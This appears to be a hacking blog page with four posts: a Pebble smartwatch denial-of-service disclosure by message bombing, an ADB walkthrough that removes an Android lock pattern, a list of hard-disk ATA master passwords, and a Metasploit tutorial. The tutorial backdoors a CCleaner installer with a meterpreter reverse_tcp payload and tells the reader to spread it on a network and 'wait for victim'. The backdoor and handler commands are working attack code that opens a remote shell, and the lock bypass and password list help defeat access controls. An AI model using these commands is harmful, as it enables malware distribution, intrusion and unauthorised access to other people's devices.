Advertisement

Tuesday, August 19, 2014

DoSing Pebble SmartWatch And Thus Deleting All Data Remotely



                                           Pebble Dos Vulnerability


                                                                                           Hemanth Joseph
                                                                       hemanthvjoseph@gmail.com
            During my recent security research on Pebble Smart watch and its Android/iOS application, I found one critical Dos vulnerability by which we can delete all data’s, apps, notes, and other information stored in it remotely .

About Pebble Smart Watches !

              Pebble smartwatch is developed by Pebble Technology Corporation and is released in 2013 . It is considered as one of the BEST Smart Watch available out there and is compatible with Android and iOS . Over 10 lack units of Pebble sold as of July 2014 .

 



Pebble Dos Vulnerability !!!  [POC]

                      
                   Pebble Smartwatch when connected to a Phone will give a Vibrating alert to Calls, Messages, E-mails, etc .. . I’m testing a Pebble with its latest v2.4.1 Firmware .
                  For every messages from Whatsapp or Facebook Messenger or such apps  Pebble will give an alert with the whole message displayed on its screen . There is no character limit in showing such messages. Even if we get a lengthy 100 word message from whatsapp with an alert Pebble will show the whole message in its small screen . From this itself it is clear that we can make it freeze by giving it a lot of notifications to display . But what actually happened during my testing shows how serious this Bug is .
What I Did Is ......
1.     Connected my Pebble Smart Watch with my Sony Z2.
2.     Tested if I am getting notification or not.
3.     Did a message bombing to my own Whatsaap Account [1500 messages in 5 sec ]

What All Ended Up With?

      As expected the whole screen of my Pebble became filled with lines ( As shown in the Picture  ) .  Soon itself it got Switched Off automatically and executed a Factory Reset without any actions from my side to do so ! . Due to that automatic Factory Reset I lost all my Apps and other data’s which I was having in my Pebble .
The same occurred even when I decreased the no. of messages to 300 in 5 sec .
By exploiting this Dos bug a person with your FB ID or Mobile Number or any such thing  can  remotely DELETE all your data’s in your Pebble by simply giving you a Small Message Bomb .

Possible Fix

·        Give a Character limit while showing such messages in Pebble .
·        Remove the Automatic Factory Reset Bug .

 



**UPDATE**

   After the freezing of your Pebble you will see a lot of white straight lines all over the screen. We can’t make it back to a working condition by simply Switching it off   we MUST do a Factory Reset in order to make it working again . So it is sure that all your data will be Deleted if your pebble gets a DoS !
Thank You For Reading .
Get Me On :
                   Facebook
                   Twitter 

Monday, December 2, 2013

How to Bypass Android Lock Patter using Kali Linux



Requirements :
Kali Linux

An Android phone

USB cable


ADB Android Tool

Step 1.


1.First Boot your Kali Linux Distribution


2.Connect your phone to your PC using USB
 cable.

Step 2. 


1. Open up Terminal

 For Installing ADB over terminal

2.Boot into any Linux distro you have.

2.On your Terminal type :


#sudo apt-get install android-tools-adb


This will install ADB Android Tool on your Kali Linux Machine.

Step 3. 


Disabling pattern unlock over terminal

1.Open up terminal again and type :


#adb devices
#adb shell
#cd data/system
#su
#rm *.key


Almost Done.

Now,disconnect your phone and reboot.Unlock
pattern should be here. Just try some random gesture and it will get unlocked.

Monday, November 25, 2013

List of Hard Disk ata master Passwords.

List of hard disk ata master passwords




Ferreted this out after some hours of web searching, we know most of our readers have gone through this situation of getting locked out of their own Hard Disk. Guess we can spare you the same trouble.

If you find this stuff useful, please do leave a comment, “hi, it worked” is enough.

Little Hacking Ideas thanks the Readers.



SEAGATE -> “Seagate” +25 spaces

MAXTOR
series N40P -> “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces
series N40P -> “Maxtor INIT SECURITY TEST STEP F”
series 541DX -> “Maxtor” +24 spaces
series Athena (D541X model 2B) and diamondmax80 -> “Maxtor”

WESTERN DIGITAL -> “WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD”

FUJITSU -> 32 spaces

SAMSUNG -> “ttttttttttttttttttttttttttttttttt” (32 times t)

IBM
series DTTA -> “CED79IJUFNATIT” +18 spaces
series DJNA -> “VON89IJUFSUNAJ” +18 spaces
series DPTA -> “VON89IJUFSUNAJ” +18 spaces
series DTLA -> “RAM00IJUFOTSELET” +16 spaces
series DADA-26480 (6,4gb) -> “BEF89IJUF__AIDACA” +15 spaces

HITACHI series DK23AA, DK23BA and DK23CA -> 32 spaces

TOSHIBA -> 32 spaces

For xbox hdds try “XBOXSCENE” or “TEAMASSEMBLY” too

Monday, August 26, 2013

Backdoor Windows Executables Using Metasploit's Plugin Msfvenom

In this tutorial, we will show you how to backdoor windows executables(exe) files using Metasploit Exploitation Framework's plugin Msfvenom(combo of msfpayload and msfencoder)

  Now follow step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1-First Download a windows executable file. For example we will take ccleaner software installer file.


 
You can also use any setup file with .exe extension.



2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/ccleaner.exe LHOST=192.168.0.14 LPORT=4444 > evilcleaner.exe

Above command will generate an EXE file with the name evilcleaner.exe. This is our backdoored executable file.
3- Start metasploit.

msfconsole

4- Start metasploit's reverse handler to get a reverse connection.


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit

5- Distribute this evilClearner.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilcleaner.exe , you will get a reverse shell on your metasploit's handler.

Happy Hacking :)
 
Design by Vinit Varghese | Bloggerized by Hemanth Joseph - Premium Blogger Themes | Online Project management